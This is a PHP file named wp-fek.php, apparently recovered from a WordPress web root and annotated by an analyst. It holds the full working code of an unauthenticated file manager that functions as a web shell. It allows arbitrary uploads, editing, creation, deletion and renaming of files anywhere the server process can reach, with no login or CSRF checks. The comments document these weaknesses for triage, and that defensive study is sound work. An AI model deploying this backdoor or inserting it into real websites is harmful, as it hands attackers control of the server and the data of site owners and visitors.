File: /var/www/html/acquasorgente.webmapp.it/wp-fek.php
<?php
// Analyst note: this file is a stand-alone, unauthenticated file manager. It
// lists, uploads, creates, edits, deletes and renames files under any directory
// the PHP process can reach, and no login, capability or CSRF check appears
// anywhere in the script. The listing header records it as wp-fek.php inside a
// WordPress document root; a file like this in a web root is worth triaging
// against a known-good copy of the site.
//
// session_start() is the only session-related call: $_SESSION is never read or
// written in this file, so the call has no effect beyond the usual
// session-cookie side effects.
session_start();
// Canonicalises a caller-supplied directory path.
//
// NOTE(review): despite the original comment (Turkish, translated below)
// describing this as "path traversal protection", there is no base-directory
// check here: realpath() only resolves symlinks and '.'/'..' segments, and any
// existing directory it returns is accepted as-is. Only a non-existent path or
// a path that is not a directory falls back to the process's working directory.
//
// @param string $path raw value, taken from the 'dir' query parameter by the caller
// @return string an absolute directory path, or getcwd() on fallback
function sanitizePath($path) {
// Original comment (translated): "Path traversal protection and fetching the real directory".
$real = realpath($path);
return ($real !== false && is_dir($real)) ? $real : getcwd();
}
// Working directory for every operation below, taken straight from the
// unauthenticated 'dir' query parameter (sanitizePath() only canonicalises it);
// defaults to the process's current working directory when absent.
$currentDir = isset($_GET['dir']) ? sanitizePath($_GET['dir']) : getcwd();
// Renders the contents of $dir as an HTML list.
// Sub-directories become links back to this script with ?dir=<absolute path>;
// regular files get Edit / Delete / Rename links that carry the directory and
// the bare file name as GET parameters (handled by the dispatcher at the bottom
// of the file). Names go through htmlspecialchars() for the HTML body and
// urlencode() for the query string.
//
// @param string $dir absolute directory path (already canonicalised by the caller)
function listDir($dir) {
// Only '.' and '..' are dropped; every other entry, dotfiles included, is shown.
$items = array_diff(scandir($dir), ['.', '..']);
echo "<h3>Current Directory: " . htmlspecialchars($dir) . "</h3><ul>";
foreach ($items as $item) {
// realpath() resolves symlinks; an entry it cannot resolve (e.g. a dangling
// symlink) is silently skipped.
$fullPath = realpath($dir . DIRECTORY_SEPARATOR . $item);
if (!$fullPath) continue;
$itemEscaped = htmlspecialchars($item);
if (is_dir($fullPath)) {
// The link uses the resolved absolute path, so a symlinked directory is
// followed to its real location.
echo "<li>📁 <a href='?dir=" . urlencode($fullPath) . "'>$itemEscaped</a></li>";
} else {
// The Delete link only has a client-side confirm(); the server performs the
// deletion on a plain GET request with no further check.
echo "<li>📄 $itemEscaped
[<a href='?dir=" . urlencode($dir) . "&action=edit&file=" . urlencode($item) . "'>Edit</a>]
[<a href='?dir=" . urlencode($dir) . "&action=delete&file=" . urlencode($item) . "' onclick='return confirm(\"Delete this file?\");'>Delete</a>]
[<a href='?dir=" . urlencode($dir) . "&action=rename&file=" . urlencode($item) . "'>Rename</a>]
</li>";
}
}
echo "</ul>";
}
// Stores the file from the multipart field 'upload' directly in $dir.
//
// NOTE(review): basename() only strips directory components from the
// client-supplied name. Nothing in this function inspects the extension, MIME
// type, size or content of the upload, and move_uploaded_file() overwrites an
// existing file of the same name.
//
// @param string $dir destination directory (the current $currentDir)
function handleUpload($dir) {
// empty() also treats a file name of "0" as absent.
if (!empty($_FILES['upload']['name'])) {
$target = $dir . DIRECTORY_SEPARATOR . basename($_FILES['upload']['name']);
if (move_uploaded_file($_FILES['upload']['tmp_name'], $target)) {
echo "<p style='color:green;'>Upload successful.</p>";
} else {
echo "<p style='color:red;'>Upload failed.</p>";
}
}
}
// Creates a sub-directory of $dir named by the POST field 'new_folder'.
// An empty (after trim) name is ignored silently; an existing path is reported.
//
// @param string $dir parent directory (the current $currentDir)
function createFolder($dir) {
$folderName = trim($_POST['new_folder'] ?? '');
if ($folderName !== '') {
// basename() keeps only the last path segment of the submitted name.
$newFolder = $dir . DIRECTORY_SEPARATOR . basename($folderName);
if (!file_exists($newFolder)) {
// Requested mode is world-writable 0777 (the process umask still applies);
// the recursive flag is set although the path is only one level deep.
if (mkdir($newFolder, 0777, true)) {
// NOTE(review): $folderName is echoed without htmlspecialchars(), unlike the
// names rendered by listDir(), so the raw POST value is reflected into the
// HTML response.
echo "<p style='color:green;'>Folder '$folderName' created.</p>";
} else {
echo "<p style='color:red;'>Failed to create folder.</p>";
}
} else {
echo "<p>Folder already exists.</p>";
}
}
}
// Creates an empty file in $dir named by the POST field 'new_file'.
// An empty (after trim) name is ignored silently; an existing path is reported.
//
// @param string $dir parent directory (the current $currentDir)
function createFile($dir) {
$fileName = trim($_POST['new_file'] ?? '');
if ($fileName !== '') {
// basename() keeps only the last path segment of the submitted name.
$newFile = $dir . DIRECTORY_SEPARATOR . basename($fileName);
if (!file_exists($newFile)) {
// Writing an empty string creates the file; the extension is not restricted.
if (file_put_contents($newFile, '') !== false) {
// NOTE(review): $fileName is echoed without htmlspecialchars(), so the raw
// POST value is reflected into the HTML response (same pattern as createFolder()).
echo "<p style='color:green;'>File '$fileName' created.</p>";
} else {
echo "<p style='color:red;'>Failed to create file.</p>";
}
} else {
echo "<p>File already exists.</p>";
}
}
}
// Edit page for a single file. On a POST carrying a 'content' field the file
// is first overwritten with the raw POST value; afterwards the (possibly new)
// contents are shown HTML-escaped in a textarea. No CSRF token or
// authentication is involved. The dispatcher calls exit right after this
// function, so the directory listing is not rendered on the edit page.
//
// @param string $file absolute path of a regular file (validated by the dispatcher)
function editFile($file) {
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['content'])) {
// The write happens before the read below, so the textarea reflects the saved state.
if (file_put_contents($file, $_POST['content']) !== false) {
echo "<p style='color:green;'>Changes saved.</p>";
} else {
echo "<p style='color:red;'>Failed to save changes.</p>";
}
}
// An unreadable file yields an empty textarea rather than an error message.
$content = is_readable($file) ? htmlspecialchars(file_get_contents($file)) : '';
// The form has no action attribute, so it posts back to the current URL with
// the dir/action/file query string intact.
echo "<form method='POST'>
<textarea name='content' style='width:100%; height:300px;'>{$content}</textarea><br>
<button type='submit'>Save</button>
<a href='?dir=" . urlencode(dirname($file)) . "' style='margin-left:10px;'>Back</a>
</form>";
}
// Deletes a single file and prints the outcome. Reached via a GET link from
// listDir(); the only confirmation is the client-side confirm() on that link.
//
// @param string $file absolute path of a regular file (validated by the dispatcher)
function deleteFile($file) {
if (file_exists($file)) {
if (unlink($file)) {
echo "<p style='color:green;'>File deleted.</p>";
} else {
echo "<p style='color:red;'>Could not delete file.</p>";
}
} else {
echo "<p>File does not exist.</p>";
}
}
// Rename page for a single file. On a POST with a non-empty 'new_name' the
// file is renamed within its own directory (dirname($file) joined with the
// basename of the submitted name); otherwise, or on failure, the rename form
// is rendered.
//
// @param string $file absolute path of a regular file (validated by the dispatcher)
function renameFile($file) {
// !empty() treats a submitted name of "0" as absent (PHP truthiness).
if ($_SERVER['REQUEST_METHOD'] === 'POST' && !empty($_POST['new_name'])) {
$newName = basename($_POST['new_name']);
$newPath = dirname($file) . DIRECTORY_SEPARATOR . $newName;
// No check that $newPath is free; rename() may replace an existing file there.
if (rename($file, $newPath)) {
echo "<p style='color:green;'>Renamed successfully.</p>";
echo "<a href='?dir=" . urlencode(dirname($newPath)) . "'>Back to directory</a>";
// Early return: the form below is skipped after a successful rename.
return;
} else {
echo "<p style='color:red;'>Rename failed.</p>";
}
}
// No action attribute: the form posts back to the current URL, query string included.
echo "<form method='POST'>
<input type='text' name='new_name' placeholder='New file/folder name' required>
<button type='submit'>Rename</button>
<a href='?dir=" . urlencode(dirname($file)) . "' style='margin-left:10px;'>Cancel</a>
</form>";
}
// Request dispatch. Every write operation below is reachable by any HTTP
// client: nothing in this file checks a login, a capability or a CSRF token.
// POST handlers run first, all against $currentDir from the 'dir' parameter.
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
if (isset($_FILES['upload'])) {
handleUpload($currentDir);
}
if (isset($_POST['new_folder'])) {
createFolder($currentDir);
}
if (isset($_POST['new_file'])) {
createFile($currentDir);
}
}
// Per-file actions are selected purely by GET parameters, so edit, delete and
// rename are all triggered by following a link; 'delete' needs no POST at all.
if (isset($_GET['action'], $_GET['file'])) {
// basename() restricts the target to an entry of $currentDir; realpath() then
// resolves it (following symlinks).
$filePath = realpath($currentDir . DIRECTORY_SEPARATOR . basename($_GET['file']));
// NOTE(review): strpos(...) === 0 is a plain string-prefix test, not a
// directory-boundary test; is_file() additionally limits actions to regular files.
if ($filePath && strpos($filePath, $currentDir) === 0 && is_file($filePath)) {
switch ($_GET['action']) {
case 'edit':
editFile($filePath);
// exit: the edit page replaces the directory view entirely.
exit;
case 'delete':
deleteFile($filePath);
// break: execution continues to the directory listing below.
break;
case 'rename':
renameFile($filePath);
// exit: the rename page replaces the directory view entirely.
exit;
default:
echo "<p style='color:red;'>Invalid action.</p>";
}
} else {
echo "<p style='color:red;'>Invalid file specified.</p>";
}
}
// Directory view: parent link, listing, then the three mutation forms. None of
// the forms has an action attribute, so they submit back to the current URL
// (query string included) and are handled by the POST branch above.
$parentDir = dirname($currentDir);
echo "<style>
body { background:#eef0f5; font-family:sans-serif; text-align:center; }
form { margin: 15px auto; max-width: 500px; }
input, button, textarea { padding: 8px; margin:5px 0; width: 90%; }
a { text-decoration:none; color:#337ab7; }
a:hover { text-decoration:underline; }
ul { list-style:none; padding-left:0; }
li { margin: 6px 0; }
</style>";
// No upper bound on navigation: the parent link keeps climbing until dirname()
// stops changing at the filesystem root.
echo "<a href='?dir=" . urlencode($parentDir) . "'>⬅️ Parent Directory</a>";
listDir($currentDir);
echo "<h3>Upload File</h3>
<form method='POST' enctype='multipart/form-data'>
<input type='file' name='upload' required>
<button type='submit'>Upload</button>
</form>";
echo "<h3>Create New Folder</h3>
<form method='POST'>
<input type='text' name='new_folder' placeholder='Folder Name' required>
<button type='submit'>Create Folder</button>
</form>";
echo "<h3>Create New File</h3>
<form method='POST'>
<input type='text' name='new_file' placeholder='File Name' required>
<button type='submit'>Create File</button>
</form>";
?>